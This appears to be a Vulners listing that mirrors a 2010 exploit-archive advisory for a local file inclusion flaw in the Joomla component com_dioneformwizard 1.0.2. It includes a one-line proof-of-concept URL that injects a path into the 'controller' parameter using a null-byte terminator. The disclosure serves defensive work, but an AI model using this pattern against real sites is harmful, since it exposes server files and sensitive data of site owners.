Lucene search
K

Joomla Component com_dioneformwizard LFI vulnerability

🗓️ 14 May 2010 00:00:00Reported by Chip D3 Bi0sType 
zdt
 zdt
🔗 0day.today👁 44 Views

Joomla com_dioneformwizard LFI vul

Code
=====================================================
Joomla Component FDione Form Wizard LFI vulnerability
=====================================================

Author		: Chip D3 Bi0s
Email		: chipdebios[alt+64]gmail.com
Date		: 2010-05-13
Impact		: Exposure of sensitive information
Where		: From Remote
---------------------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application   	: Dione Form Wizard
version       	: 1.0.2
Developer     	: Dione Soft Company
License       	: GPL            type  : Commercial
price		: $20
Date Added    	: 9 may 2010
Download      	: http://dionesoft.com/products/dione_form_wizard/product.html

Description   	:

Dione Form Wizard is Joomla! component allows website administrator to create web forms easily through simple drag-and-drop editor.

This product gives you the power to create forms that run inside Joomla without requiring knowledge of HTML, MySQL and PHP.

The main idea of the Dione Form Wizard is to give a tool that is enabling you to create a dynamic forms in minutes within your Joomla! CMS.
---------------------------------------------------------------------------

Poc/Exploit:
~~~~~~~~~

http://127.0.0.1/[path]/index.php?option=com_dioneformwizard&controller=[LFI]%00




#  0day.today [2018-01-01]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

14 May 2010 00:00Current
7.1High risk
Vulners AI Score7.1
44